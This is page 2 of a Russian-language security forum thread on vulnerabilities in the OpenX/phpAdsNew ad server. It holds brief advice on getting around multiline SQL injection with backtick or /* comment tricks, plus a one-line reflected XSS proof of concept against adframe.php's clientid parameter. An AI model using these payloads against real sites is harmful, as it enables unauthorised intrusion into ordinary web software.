Регистрация
Поиск
Сообщения за день
Все разделы прочитаны
RDot
>
Аспекты НСД
>
Web-среда/Web-applications
>
Сценарии/CMF/СMS
Уязвимости Openx (phpAdsNew, Openads)
Имя
Запомнить?
Пароль
Страница 2 из 2
<
1
2
Опции темы
Поиск в этой теме
Опции просмотра
26.07.2012, 12:13
#
11
Boolean
Регистрация: 19.10.2011
Сообщений: 111
Репутация:
34
Цитата:
Сообщение от
yusmat
в том то и дело что коментировать бесполезно так как запрос многострочный то есть содержит enter
отрезаеться только то что идет в первой строке остальное дает sql error
Используй алиас (`) вместо многострочного комментария.
__________________
|
Boolean
Посмотреть профиль
Отправить личное сообщение для Boolean
Найти ещё сообщения от Boolean
26.07.2012, 12:39
#
12
Beched
Регистрация: 06.07.2010
Сообщений: 395
Репутация:
118
Цитата:
Сообщение от
Boolean
Используй алиас (`) вместо многострочного комментария.
Так там дальше тоже они используются, не прокатит.
Если версия старше 5.забылкакой, то прокатит /*
__________________
Заметки о взломе ; проверка на уязвимости
A hack CTF
Beched
Посмотреть профиль
Отправить личное сообщение для Beched
Найти ещё сообщения от Beched
17.08.2012, 21:02
#
13
get
Регистрация: 10.08.2012
Сообщений: 4
Репутация:
1
XSS
(Версия не определена, но, предположительно, ветки phpAdsNew)
PoC:
Код:
/adframe.php?n=a4f592af&
clientid
=2'><script>alert(/asd/)</script>
get
Посмотреть профиль
Отправить личное сообщение для get
Найти ещё сообщения от get
Страница 2 из 2
<
1
2
Метки
auth bypass
,
lfi
,
rce
,
sql-inj
,
xss
«
Предыдущая тема
|
Следующая тема
»
Опции темы
Поиск в этой теме
Версия для печати
Отправить по электронной почте
Поиск в этой теме
:
Расширенный поиск
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Ваши права в разделе
Вы
не можете
создавать новые темы
Вы
не можете
отвечать в темах
Вы
не можете
прикреплять вложения
Вы
не можете
редактировать свои сообщения
BB коды
Вкл.
Смайлы
Вкл.
[IMG]
код
Вкл.
HTML код
Выкл.
Правила форума
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
RDot.org
Релизы/Releases
Статьи/Articles
Чужие статьи/Переводы;Foreign articles/translations
Презентации, вебинары, видео/Presentations, Webinars, Videos
Видео/Videos
Квесты/CTF
Обратная связь/Feedback
Аспекты НСД
Web-среда/Web-applications
Сценарии/CMF/СMS
Форумы
Уязвимости PHP/PHP vulnerabilities
Целевые системы/Target systems
Сервисы, БД, Серверы/Network services, Databases, Servers
Повышение привилегий/Privilege escalation
Аудит Web-приложений/Web Application Security Audit
Инструментарий/Tools
Технические аспекты
Операционные системы/OS
*nix-like
Windows
Программирование/Programming
Web development
Software development
Криптография/Cryptography
Аппаратное обеспечение/Electronic equipment
Фрикинг/Phreaking
Беспроводные технологии/Wireless
Песочница/Sandbox
Коммерция/Сommerce
Мировые новости/World news
Оффтоп/Offtopic
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод:
zCarot
-- English (US)
-- Russian
Обратная связь
-
Архив
-
Вверх